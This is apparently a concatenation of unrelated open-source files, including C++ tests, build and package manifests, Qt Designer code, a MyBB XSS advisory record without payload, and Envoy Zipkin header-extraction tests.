MapConsistencyTest) { addCrossMissionObservations(); ASSERT_TRUE(checkMapConsistency(map_)); EXPECT_EQ(map_.numMissions(), 2u); map_.removeMission(first_mission_id_, true); EXPECT_TRUE(checkMapConsistency(map_)); EXPECT_EQ(map_.numMissions(), 1u); } TEST_F(RemoveMissionTest, MapConsistencyTestWithMergedLandmarkObservations) { addCrossMissionObservations(); addNonChronologicalLandmarkMerges(); ASSERT_TRUE(checkMapConsistency(map_)); EXPECT_EQ(map_.numMissions(), 2u); map_.removeMission(first_mission_id_, true); EXPECT_TRUE(checkMapConsistency(map_)); EXPECT_EQ(map_.numMissions(), 1u); } } // namespace map_optimization_legacy MAPLAB_UNITTEST_ENTRYPOINT
2,243
5,169
{ "name": "zzhengkit", "version": "1.0.0", "summary": "zzkit is a custom control.", "description": "zzkit is a tool for testing podspec", "homepage": "https://github.com/Zzzzzzhen/zzkit", "license": "MIT", "authors": { "zhaozheng": "<EMAIL>" }, "platforms": { "ios": "8.0" }, "source": { "git": "https://github.com/Zzzzzzhen/zzkit.git", "tag": "1.0.0" }, "source_files": "ZZKit/ZZKit/ZZView/**/*.{h,m}" }
224
766
"""Provides an internal interface for working with image features.""" __all__ = ["image"]
23
398
<gh_stars>100-1000 package io.joyrpc.spring.schema; /*- * #%L * joyrpc * %% * Copyright (C) 2019 joyrpc.io * %% * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #L% */ import io.joyrpc.spring.processor.DependsOnDefinitionPostProcessor; import org.springframework.beans.factory.config.BeanDefinition; import org.springframework.beans.factory.support.BeanDefinitionRegistry; import org.springframework.beans.factory.support.RootBeanDefinition; import org.springframework.beans.factory.xml.NamespaceHandlerSupport; import org.springframework.beans.factory.xml.ParserContext; import org.w3c.dom.Element; import java.util.concurrent.atomic.AtomicBoolean; /** * Binds the XML tags to their parsers */ public class SpringNamespaceHandler extends NamespaceHandlerSupport { protected AtomicBoolean ready = new AtomicBoolean(); @Override public void init() { registerBeanDefinitionParser("provider", new ProviderBeanDefinitionParser()); registerBeanDefinitionParser("consumer", new ConsumerBeanDefinitionParser()); registerBeanDefinitionParser("consumerGroup", new ConsumerGroupBeanDefinitionParser()); registerBeanDefinitionParser("server", new ServerBeanDefinitionParser()); registerBeanDefinitionParser("registry", new RegistryBeanDefinitionParser()); registerBeanDefinitionParser("parameter", new GlobalParameterDefinitionParser()); } @Override public BeanDefinition parse(Element element, ParserContext parserContext) { if (ready.compareAndSet(false, true)) { BeanDefinitionRegistry registry = parserContext.getRegistry(); if (!registry.containsBeanDefinition(DependsOnDefinitionPostProcessor.BEAN_NAME)) { registry.registerBeanDefinition(DependsOnDefinitionPostProcessor.BEAN_NAME, new RootBeanDefinition(DependsOnDefinitionPostProcessor.class)); } } return super.parse(element, parserContext); } }
800
2,099
<reponame>yuyedaidao/SGPlayer<filename>SGPlayer/Classes/Core/SGMetal/SGMetalModel.h // // SGMetalModel.h // MetalTest // // Created by Single on 2019/6/24. // Copyright © 2019 Single. All rights reserved. // #import <Metal/Metal.h> @interface SGMetalModel : NSObject - (instancetype)initWithDevice:(id<MTLDevice>)device; @property (nonatomic) NSUInteger indexCount; @property (nonatomic) MTLIndexType indexType; @property (nonatomic) MTLPrimitiveType primitiveType; @property (nonatomic, strong) id<MTLDevice> device; @property (nonatomic, strong) id<MTLBuffer> indexBuffer; @property (nonatomic, strong) id<MTLBuffer> vertexBuffer; @end
221
34,359
/*++ Copyright (c) Microsoft Corporation Module Name: - EventSynthesis.hpp Abstract: - Defined functions for converting strings/characters into events (for interactivity) Separated from types/convert. Author: - <NAME> (duhowett) 10-Feb-2021 --*/ #pragma once #include <deque> #include <memory> #include "../../types/inc/IInputEvent.hpp" namespace Microsoft::Console::Interactivity { std::deque<std::unique_ptr<KeyEvent>> CharToKeyEvents(const wchar_t wch, const unsigned int codepage); std::deque<std::unique_ptr<KeyEvent>> SynthesizeKeyboardEvents(const wchar_t wch, const short keyState); std::deque<std::unique_ptr<KeyEvent>> SynthesizeNumpadEvents(const wchar_t wch, const unsigned int codepage); }
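A hedged calling sketch for the helpers declared above; the include path, the choice of L'a', and the 437 code page are illustrative assumptions, and building it would of course require the rest of the console codebase that defines KeyEvent:

#include <iostream>
#include "EventSynthesis.hpp"

int main()
{
    using namespace Microsoft::Console::Interactivity;
    // Turn the character 'a' into the key events that would produce it;
    // 437 is used purely as an example code page.
    const auto events = CharToKeyEvents(L'a', 437);
    std::cout << "synthesized " << events.size() << " key events\n";
    return 0;
}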
318
892
{ "schema_version": "1.2.0", "id": "GHSA-w5xq-qgqm-hj39", "modified": "2022-05-01T07:18:47Z", "published": "2022-05-01T07:18:47Z", "aliases": [ "CVE-2006-4449" ], "details": "Cross-site scripting (XSS) vulnerability in attachment.php in MyBulletinBoard (MyBB) 1.1.7 and possibly other versions allows remote attackers to inject arbitrary web script or HTML via a GIF image that contains URL-encoded Javascript, which is rendered by Internet Explorer.", "severity": [ ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-4449" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/28587" }, { "type": "WEB", "url": "http://secunia.com/advisories/21645" }, { "type": "WEB", "url": "http://securityreason.com/securityalert/1469" }, { "type": "WEB", "url": "http://www.mybboard.com/archive.php?nid=18" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/444414/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/19718" } ], "database_specific": { "cwe_ids": [ ], "severity": "MODERATE", "github_reviewed": false } }
609
3,049
<reponame>juldou/seldon-core<gh_stars>1000+ package io.seldon.engine.util; import java.io.IOException; import java.nio.charset.Charset; import java.nio.file.Files; import java.nio.file.Paths; import java.util.Base64; public class TestUtils { public static byte[] readFileBytes(String path) throws IOException { return Files.readAllBytes(Paths.get(path)); } public static String readFile(String path, Charset encoding) throws IOException { return new String(readFileBytes(path), encoding); } public static String readFileBase64(String path) throws IOException { return Base64.getEncoder().encodeToString(readFileBytes(path)); } }
219
3,095
<filename>designer/lib/shared/qdesigner_propertyeditor.cpp /**************************************************************************** ** ** Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies). ** All rights reserved. ** Contact: Nokia Corporation (<EMAIL>) ** ** This file is part of the Qt Designer of the Qt Toolkit. ** ** $QT_BEGIN_LICENSE:LGPL$ ** Commercial Usage ** Licensees holding valid Qt Commercial licenses may use this file in ** accordance with the Qt Commercial License Agreement provided with the ** Software or, alternatively, in accordance with the terms contained in ** a written agreement between you and Nokia. ** ** GNU Lesser General Public License Usage ** Alternatively, this file may be used under the terms of the GNU Lesser ** General Public License version 2.1 as published by the Free Software ** Foundation and appearing in the file LICENSE.LGPL included in the ** packaging of this file. Please review the following information to ** ensure the GNU Lesser General Public License version 2.1 requirements ** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html. ** ** In addition, as a special exception, Nokia gives you certain additional ** rights. These rights are described in the Nokia Qt LGPL Exception ** version 1.1, included in the file LGPL_EXCEPTION.txt in this package. ** ** GNU General Public License Usage ** Alternatively, this file may be used under the terms of the GNU ** General Public License version 3.0 as published by the Free Software ** Foundation and appearing in the file LICENSE.GPL included in the ** packaging of this file. Please review the following information to ** ensure the GNU General Public License version 3.0 requirements will be ** met: http://www.gnu.org/copyleft/gpl.html. ** ** If you have questions regarding the use of this file, please contact ** Nokia at <EMAIL>. ** $QT_END_LICENSE$ ** ****************************************************************************/ #include "qdesigner_propertyeditor_p.h" #include "pluginmanager_p.h" #include <QtDesigner/QDesignerFormEditorInterface> #include <widgetfactory_p.h> #include <QtGui/QAction> #include <QtGui/QLineEdit> #include <QtGui/QAbstractButton> QT_BEGIN_NAMESPACE namespace qdesigner_internal { typedef QDesignerPropertyEditor::StringPropertyParameters StringPropertyParameters; // A map of property name to type typedef QHash<QString, StringPropertyParameters> PropertyNameTypeMap; // Compile a map of hard-coded string property types static const PropertyNameTypeMap &stringPropertyTypes() { static PropertyNameTypeMap propertyNameTypeMap; if (propertyNameTypeMap.empty()) { const StringPropertyParameters richtext(ValidationRichText, true); // Accessibility. 
Both are texts the narrator reads propertyNameTypeMap.insert(QLatin1String("accessibleDescription"), richtext); propertyNameTypeMap.insert(QLatin1String("accessibleName"), richtext); // object names const StringPropertyParameters objectName(ValidationObjectName, false); propertyNameTypeMap.insert(QLatin1String("buddy"), objectName); propertyNameTypeMap.insert(QLatin1String("currentItemName"), objectName); propertyNameTypeMap.insert(QLatin1String("currentPageName"), objectName); propertyNameTypeMap.insert(QLatin1String("currentTabName"), objectName); propertyNameTypeMap.insert(QLatin1String("layoutName"), objectName); propertyNameTypeMap.insert(QLatin1String("spacerName"), objectName); // Style sheet propertyNameTypeMap.insert(QLatin1String("styleSheet"), StringPropertyParameters(ValidationStyleSheet, false)); // Buttons/ QCommandLinkButton const StringPropertyParameters multiline(ValidationMultiLine, true); propertyNameTypeMap.insert(QLatin1String("description"), multiline); propertyNameTypeMap.insert(QLatin1String("iconText"), multiline); // Tooltips, etc. propertyNameTypeMap.insert(QLatin1String("toolTip"), richtext); propertyNameTypeMap.insert(QLatin1String("whatsThis"), richtext); propertyNameTypeMap.insert(QLatin1String("windowIconText"), richtext); propertyNameTypeMap.insert(QLatin1String("html"), richtext); // A QWizard page id propertyNameTypeMap.insert(QLatin1String("pageId"), StringPropertyParameters(ValidationSingleLine, false)); // QPlainTextEdit propertyNameTypeMap.insert(QLatin1String("plainText"), StringPropertyParameters(ValidationMultiLine, true)); } return propertyNameTypeMap; } QDesignerPropertyEditor::QDesignerPropertyEditor(QWidget *parent, Qt::WindowFlags flags) : QDesignerPropertyEditorInterface(parent, flags), m_propertyChangedForwardingBlocked(false) { // Make old signal work for compatibility connect(this, SIGNAL(propertyChanged(QString,QVariant)), this, SLOT(slotPropertyChanged(QString,QVariant))); } QDesignerPropertyEditor::StringPropertyParameters QDesignerPropertyEditor::textPropertyValidationMode( QDesignerFormEditorInterface *core, const QObject *object, const QString &propertyName, bool isMainContainer) { // object name - no comment if (propertyName == QLatin1String("objectName")) { const TextPropertyValidationMode vm = isMainContainer ? ValidationObjectNameScope : ValidationObjectName; return StringPropertyParameters(vm, false); } // Check custom widgets by class. const QString className = WidgetFactory::classNameOf(core, object); const QDesignerCustomWidgetData customData = core->pluginManager()->customWidgetData(className); if (!customData.isNull()) { StringPropertyParameters customType; if (customData.xmlStringPropertyType(propertyName, &customType)) return customType; } // Check hardcoded property names const PropertyNameTypeMap::const_iterator hit = stringPropertyTypes().constFind(propertyName); if (hit != stringPropertyTypes().constEnd()) return hit.value(); // text: Check according to widget type. 
if (propertyName == QLatin1String("text")) { if (qobject_cast<const QAction *>(object) || qobject_cast<const QLineEdit *>(object)) return StringPropertyParameters(ValidationSingleLine, true); if (qobject_cast<const QAbstractButton *>(object)) return StringPropertyParameters(ValidationMultiLine, true); return StringPropertyParameters(ValidationRichText, true); } // Fuzzy matching if (propertyName.endsWith(QLatin1String("Name"))) return StringPropertyParameters(ValidationSingleLine, true); if (propertyName.endsWith(QLatin1String("ToolTip"))) return StringPropertyParameters(ValidationRichText, true); #ifdef Q_OS_WIN // No translation for the active X "control" property if (propertyName == QLatin1String("control") && className == QLatin1String("QAxWidget")) return StringPropertyParameters(ValidationSingleLine, false); #endif // default to single return StringPropertyParameters(ValidationSingleLine, true); } void QDesignerPropertyEditor::emitPropertyValueChanged(const QString &name, const QVariant &value, bool enableSubPropertyHandling) { // Avoid duplicate signal emission - see below m_propertyChangedForwardingBlocked = true; emit propertyValueChanged(name, value, enableSubPropertyHandling); emit propertyChanged(name, value); m_propertyChangedForwardingBlocked = false; } void QDesignerPropertyEditor::slotPropertyChanged(const QString &name, const QVariant &value) { // Forward signal from Integration using the old interfaces. if (!m_propertyChangedForwardingBlocked) emit propertyValueChanged(name, value, true); } } QT_END_NAMESPACE
2,358
1,133
<reponame>mikesep/comdb2 /* Copyright 2015 Bloomberg Finance L.P. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package com.bloomberg.comdb2.jdbc; import java.io.Serializable; import java.util.Arrays; import java.util.List; /** * Cdb2DbInfoResponse * * @author <NAME> * @author <NAME> */ public class Cdb2DbInfoResponse implements Serializable{ private static final long serialVersionUID = -3986582382656884287L; static class NodeInfo { String name; int number; int incoherent; int room; int port; NodeInfo(String name, int number, int incoherent, int room, int port) { super(); this.name = name; this.number = number; this.incoherent = incoherent; this.room = room; this.port = port; } @Override public String toString() { return String.format("name = %s, number = %d, incoherent = %d, room = %d, port = %d", name, number, incoherent, room, port); } } NodeInfo master; List<NodeInfo> nodes; Constants.PEER_SSL_MODE peermode; @Override public String toString() { return master.toString() + "\n" + Arrays.toString(nodes.toArray(new NodeInfo[]{})); } } /* vim: set sw=4 ts=4 et: */
694
409
//![initialization] #include <iostream> #include <seqan/index.h> using namespace seqan; int main() { StringSet<CharString> myStringSet; appendValue(myStringSet, "tobeornottobe"); appendValue(myStringSet, "thebeeonthecomb"); appendValue(myStringSet, "beingjohnmalkovich"); typedef Index<StringSet<CharString> > TMyIndex; TMyIndex myIndex(myStringSet); //![initialization] //![iteration1] Iterator<TMyIndex, TopDown<ParentLinks<Postorder> > >::Type myIterator(myIndex); // Top-down iterators start in the root node which is not the first node of a // postorder DFS. Thus we have to manually go to the DFS start with goBegin goBegin(myIterator); while (!atEnd(myIterator)) { std::cout << representative(myIterator) << std::endl; ++myIterator; } //![iteration1] //![iteration2] Iterator<TMyIndex, BottomUp<> >::Type myIterator2(myIndex); while (!atEnd(myIterator2)) { std::cout << representative(myIterator2) << std::endl; ++myIterator2; } return 0; } //![iteration2]
422
818
<filename>kogito-codegen-modules/kogito-codegen-openapi/src/test/java/org/kie/kogito/codegen/openapi/client/OpenApiClientCodegenTest.java /* * Copyright 2021 Red Hat, Inc. and/or its affiliates. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.kie.kogito.codegen.openapi.client; import java.nio.file.Paths; import java.util.Collection; import java.util.Collections; import java.util.HashMap; import java.util.Map; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.MethodSource; import org.kie.kogito.codegen.api.GeneratedFile; import org.kie.kogito.codegen.api.context.KogitoBuildContext; import static org.assertj.core.api.Assertions.assertThat; import static org.kie.kogito.codegen.api.utils.CollectedResourcesTestUtils.toCollectedResources; class OpenApiClientCodegenTest { @ParameterizedTest @MethodSource("org.kie.kogito.codegen.api.utils.KogitoContextTestUtils#contextBuilders") public void isEmpty(KogitoBuildContext.Builder contextBuilder) { final String workflowDefinitionFile = "/sendcloudeventonprovision.sw.json"; KogitoBuildContext context = contextBuilder.build(); OpenApiClientCodegen emptyCodeGenerator = OpenApiClientCodegen.ofCollectedResources(context, Collections.emptyList()); assertThat(emptyCodeGenerator.isEmpty()).isTrue(); assertThat(emptyCodeGenerator.isEnabled()).isFalse(); Collection<GeneratedFile> emptyGeneratedFiles = emptyCodeGenerator.generate(); assertThat(emptyGeneratedFiles.size()).isEqualTo(0); final OpenApiClientCodegen codeGenerator = OpenApiClientCodegen.ofCollectedResources(context, toCollectedResources(workflowDefinitionFile)); assertThat(codeGenerator.isEmpty()).isFalse(); assertThat(codeGenerator.isEnabled()).isTrue(); assertThat(codeGenerator.getOpenAPISpecResources()).hasSizeGreaterThanOrEqualTo(1); } @ParameterizedTest @MethodSource("org.kie.kogito.codegen.api.utils.KogitoContextTestUtils#contextBuilders") void verifyHTTPResource(final KogitoBuildContext.Builder contextBuilder) { final String workflowDefinitionFile = "/sendcloudeventonprovision.sw.json"; final KogitoBuildContext context = contextBuilder.build(); final OpenApiClientCodegen codegen = OpenApiClientCodegen.ofCollectedResources(context, toCollectedResources(workflowDefinitionFile)); assertThat(codegen).isNotNull(); assertThat(codegen.getOpenAPISpecResources()).isNotEmpty(); assertThat(codegen.getOpenAPISpecResources()).hasSize(1); assertThat(codegen.getOpenAPISpecResources().get(0).getResourceName()).isEqualTo("provisioning.json"); assertThat(codegen.getOpenAPISpecResources().get(0).getId()).contains("provisioning"); assertThat(codegen.getOpenAPISpecResources().get(0).getURI().getScheme()).isEqualTo("http"); } @ParameterizedTest @MethodSource("org.kie.kogito.codegen.api.utils.KogitoContextTestUtils#contextBuilders") void verifyLocalMultipleResources(final KogitoBuildContext.Builder contextBuilder) { final String workflowDefinitionFile = "/sendcloudeventonprovision2.sw.json"; final KogitoBuildContext context = contextBuilder.build(); final OpenApiClientCodegen 
codegen = OpenApiClientCodegen.ofCollectedResources(context, toCollectedResources(workflowDefinitionFile)); assertThat(codegen).isNotNull(); assertThat(codegen.getOpenAPISpecResources()).isNotEmpty(); assertThat(codegen.getOpenAPISpecResources()).hasSize(1); assertThat(codegen.getOpenAPISpecResources().get(0).getResourceName()).isEqualTo("provisioning.json"); assertThat(codegen.getOpenAPISpecResources().get(0).getId()).contains("provisioning"); assertThat(codegen.getOpenAPISpecResources().get(0).getURI().getScheme()).isNull(); } @ParameterizedTest @MethodSource("org.kie.kogito.codegen.api.utils.KogitoContextTestUtils#contextBuilders") void verifyCodegenClasspath(final KogitoBuildContext.Builder contextBuilder) { final String workflowDefinitionFile = "/petstore-classpath.sw.json"; final KogitoBuildContext context = contextBuilder.build(); final OpenApiClientCodegen codegen = OpenApiClientCodegen.ofCollectedResources(context, toCollectedResources(workflowDefinitionFile)); assertCodeGen(codegen.generate()); assertThat(codegen.getOpenAPISpecResources()).hasSize(1); assertThat(codegen.getOpenAPISpecResources().get(0).getRequiredOperations()).hasSize(2); assertThat(codegen.getOpenAPISpecResources().get(0).getRequiredOperations() .stream() .anyMatch(o -> o.getOperationId().equals("getInventory") && o.getParameters().size() == 0 && o.getGeneratedClass().endsWith("StoreApi"))).isTrue(); assertThat(codegen.getOpenAPISpecResources().get(0).getRequiredOperations() .stream() .anyMatch(o -> o.getOperationId().equals("uploadFile") && o.getParameters().size() == 3 && o.getGeneratedClass().endsWith("PetApi"))).isTrue(); } private void assertCodeGen(final Collection<GeneratedFile> generatedFiles) { assertThat(generatedFiles).isNotEmpty(); final Map<String, Boolean> requiredFiles = new HashMap<>(); requiredFiles.put("ApiClient.java", false); requiredFiles.put("KogitoApiClient.java", false); requiredFiles.put("PetApi.java", false); final Map<String, Boolean> absentFiles = new HashMap<>(); absentFiles.put("Pet.api", false); for (GeneratedFile file : generatedFiles) { assertThat(file.relativePath()).endsWith(".java"); final String fileName = Paths.get(file.relativePath()).getFileName().toString(); requiredFiles.computeIfPresent(fileName, (k, v) -> true); absentFiles.computeIfPresent(fileName, (k, v) -> true); } assertThat(requiredFiles).allSatisfy((file, present) -> { assertThat(present).isTrue(); }); assertThat(absentFiles).allSatisfy((file, present) -> { assertThat(present).isFalse(); }); } }
2,647
1,025
<filename>CodeXL/Components/GpuDebugging/AMDTOpenCLServer/src/csOpenCLHandleMonitor.cpp //================================================================================== // Copyright (c) 2016 , Advanced Micro Devices, Inc. All rights reserved. // /// \author AMD Developer Tools Team /// \file csOpenCLHandleMonitor.cpp /// //================================================================================== //------------------------------ csOpenCLHandleMonitor.cpp ------------------------------ // Infra: #include <AMDTBaseTools/Include/gtAssert.h> #include <AMDTOSWrappers/Include/osDebugLog.h> #include <AMDTOSWrappers/Include/osCriticalSectionLocker.h> // Local: #include <src/csOpenCLHandleMonitor.h> // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::csOpenCLHandleMonitor // Description: Constructor. // Arguments: // Author: <NAME> // Date: 8/12/2009 // --------------------------------------------------------------------------- csOpenCLHandleMonitor::csOpenCLHandleMonitor() { } // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::~csOpenCLHandleMonitor // Description: Destructor. // Author: <NAME> // Date: 8/12/2009 // --------------------------------------------------------------------------- csOpenCLHandleMonitor::~csOpenCLHandleMonitor() { osCriticalSectionLocker mapCSLocker(m_clHandleObjectsMapAccessCS); // Clear the object IDs: gtMap<oaCLHandle, apCLObjectID*>::iterator iter = _clHandleObjectsMap.begin(); gtMap<oaCLHandle, apCLObjectID*>::iterator endIter = _clHandleObjectsMap.end(); for (; endIter != iter; iter++) { delete(*iter).second; } // Clear the map: _clHandleObjectsMap.clear(); } // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::getCLHandleObjectDetails // Description: Return an OpenCL object by its handle // Arguments: void* ptr // Return Val: apCLObjectID* // Author: <NAME> // Date: 8/12/2009 // --------------------------------------------------------------------------- apCLObjectID* csOpenCLHandleMonitor::getCLHandleObjectDetails(oaCLHandle ptr) const { apCLObjectID* pRetVal = NULL; // Do not attempt this if the critical section is locked: if (((osCriticalSection&)m_clHandleObjectsMapAccessCS).tryEntering()) { // Find the handle within the map: gtMap<oaCLHandle, apCLObjectID*>::const_iterator iterFind = _clHandleObjectsMap.find(ptr); if (iterFind != _clHandleObjectsMap.end()) { pRetVal = (*iterFind).second; } ((osCriticalSection&)m_clHandleObjectsMapAccessCS).leave(); } return pRetVal; } // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::registerOpenCLHandle // Description: Adds an openCL handle mapping // Arguments: void* ptr // int contextId // int objectId // osTransferableObjectType objectType // int ownerObjectId - represent the object that owns the object - // for example - program for kernels. 
This parameter is optional // int objectDisplayId - when the object name is different then it's index (object that // are released), use this parameter for the object 'real' display name // Return Val: void // Author: <NAME> // Date: 8/12/2009 // --------------------------------------------------------------------------- void csOpenCLHandleMonitor::registerOpenCLHandle(oaCLHandle ptr, int contextId, int objectId, osTransferableObjectType objectType, int ownerObjectId, int objectDisplayId) { osCriticalSectionLocker mapCSLocker(m_clHandleObjectsMapAccessCS); apCLObjectID* pNewObj = getCLHandleObjectDetails(ptr); if (pNewObj == NULL) { pNewObj = new apCLObjectID; // Insert the new object to the map: _clHandleObjectsMap[ptr] = pNewObj; } // Set the object details: pNewObj->_contextId = contextId; pNewObj->_objectId = objectId; pNewObj->_objectType = objectType; pNewObj->_ownerObjectId = ownerObjectId; pNewObj->_objectDisplayName = objectDisplayId; } // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::nameHandledObject // Description: Sets the name of a handled object, to match a call to a // clNameXxxxGREMEDY() function. // Author: <NAME> // Date: 22/7/2010 // --------------------------------------------------------------------------- void csOpenCLHandleMonitor::nameHandledObject(oaCLHandle handle, const gtString& objectName) { osCriticalSectionLocker mapCSLocker(m_clHandleObjectsMapAccessCS); gtMap<oaCLHandle, apCLObjectID*>::iterator findIter = _clHandleObjectsMap.find(handle); if (findIter != _clHandleObjectsMap.end()) { apCLObjectID* pObjectId = (*findIter).second; GT_IF_WITH_ASSERT(pObjectId != NULL) { pObjectId->_objectName = objectName; } } } // --------------------------------------------------------------------------- // Name: csOpenCLHandleMonitor::validateLivingHandle // Description: Returns true iff the handle is registered as a living object of the given type. // Author: <NAME> // Date: 28/7/2015 // --------------------------------------------------------------------------- bool csOpenCLHandleMonitor::validateLivingHandle(oaCLHandle handle, osTransferableObjectType type) const { bool retVal = false; if (OA_CL_NULL_HANDLE != handle) { // HERE BE DRAGONS! // Do not attempt to update an object we "know" is dead (that is to say, its handle has been released, but it is not yet reused). apCLObjectID* pObj = getCLHandleObjectDetails(handle); retVal = (nullptr != pObj); if (retVal) { retVal = (-1 < pObj->_objectId); // Devices are not context-bound: if (OS_TOBJ_ID_CL_DEVICE != type) { retVal = retVal && (0 < pObj->_contextId); } else // OS_TOBJ_ID_CL_DEVICE == type { retVal = retVal && (0 == pObj->_contextId); } retVal = retVal && (type == pObj->_objectType); } } return retVal; }
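A rough sketch of the register/lookup cycle implemented above; the handle value, the object id, and the -1 owner/display ids are made-up illustrative values, and OS_TOBJ_ID_CL_DEVICE is chosen only because it is the transferable-object type this implementation itself refers to:

#include <src/csOpenCLHandleMonitor.h>

void demoHandleMonitor()
{
    csOpenCLHandleMonitor monitor;
    oaCLHandle handle = (oaCLHandle)0x1234;  // placeholder handle value

    // Devices are registered with context id 0; validateLivingHandle above
    // expects exactly that for OS_TOBJ_ID_CL_DEVICE.
    monitor.registerOpenCLHandle(handle, 0, 1, OS_TOBJ_ID_CL_DEVICE, -1, -1);

    apCLObjectID* pObj = monitor.getCLHandleObjectDetails(handle);
    bool alive = monitor.validateLivingHandle(handle, OS_TOBJ_ID_CL_DEVICE);
    (void)pObj;
    (void)alive;
}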
2,227
1,002
<reponame>ikeji/mozc-devices #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import codecs import os from setuptools import setup, find_packages def read_file(name): with codecs.open( os.path.join(os.path.dirname(__file__), name), 'r', 'utf-8') as f: return f.read().strip() setup( name='nazoru-input', version='0.1.2', author='<NAME>', author_email='<EMAIL>', url='https://landing.google.com/tegaki', description='Package for Gboard Physical Handwriting Version', long_description=read_file('README.rst'), license='Apache', classifiers=[ 'Development Status :: 3 - Alpha', 'Environment :: Console', 'Environment :: No Input/Output (Daemon)', 'Operating System :: OS Independent', 'Programming Language :: Python', 'License :: OSI Approved :: Apache Software License', 'Topic :: Scientific/Engineering :: Artificial Intelligence', 'Topic :: Software Development :: Libraries :: Python Modules', 'Topic :: Utilities', ], packages=find_packages('src'), package_dir={'': 'src'}, package_data={ 'nazoru': ['data/optimized_nazoru.pb'] }, scripts=[ 'bin/nazoru-input', 'bin/nazoru-training' ], # For installing the nazoru_input as a service of systemd. Please uncomment # the following |data_files| if you want to install nazoru.service. # data_files=[('/etc/systemd/system', ['data/nazoru.service'])], install_requires=[ 'cairocffi', 'pillow', 'tensorflow~=2.5.1', 'tf_slim~=1.1.0', 'enum34;python_version<"3.4"', 'pyserial', 'evdev;platform_system=="Linux"', 'wiringpi;platform_system=="Linux"' ] )
889
348
<filename>docs/data/t2/031/31123.json {"nom":"Castillon-de-Larboust","dpt":"Haute-Garonne","inscrits":65,"abs":11,"votants":54,"blancs":9,"nuls":2,"exp":43,"res":[{"panneau":"1","voix":31},{"panneau":"2","voix":12}]}
93
17,703
<gh_stars>1000+ #include "source/common/tracing/http_tracer_impl.h" #include "source/extensions/tracers/zipkin/span_context.h" #include "source/extensions/tracers/zipkin/span_context_extractor.h" #include "test/test_common/utility.h" #include "gtest/gtest.h" namespace Envoy { namespace Extensions { namespace Tracers { namespace Zipkin { namespace { const std::string trace_id{"0000000000000001"}; const std::string trace_id_high{"0000000000000009"}; const std::string span_id{"0000000000000003"}; const std::string parent_id{"0000000000000002"}; } // namespace TEST(ZipkinSpanContextExtractorTest, Largest) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}-{}-1-{}", trace_id_high, trace_id, span_id, parent_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(2, context.first.parentId()); EXPECT_TRUE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(9, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, WithoutParentDebug) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}-{}-d", trace_id_high, trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); auto context = extractor.extractSpanContext(true); EXPECT_TRUE(context.second); EXPECT_EQ(3, context.first.id()); EXPECT_EQ(0, context.first.parentId()); EXPECT_TRUE(context.first.is128BitTraceId()); EXPECT_EQ(1, context.first.traceId()); EXPECT_EQ(9, context.first.traceIdHigh()); EXPECT_TRUE(context.first.sampled()); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, false})); } TEST(ZipkinSpanContextExtractorTest, MalformedUuid) { Http::TestRequestHeaderMapImpl request_headers{{"b3", "b970dafd-0d95-40aa-95d8-1d8725aebe40"}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: invalid trace id b970dafd-0d95-40"); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, MiddleOfString) { Http::TestRequestHeaderMapImpl request_headers{ {"b3", fmt::format("{}{}-{},", trace_id, trace_id, span_id)}}; SpanContextExtractor extractor(request_headers); EXPECT_THROW_WITH_MESSAGE(extractor.extractSpanContext(true), ExtractorException, "Invalid input: truncated"); EXPECT_TRUE(extractor.extractSampled({Tracing::Reason::Sampling, true})); } TEST(ZipkinSpanContextExtractorTest, DebugOnly) { 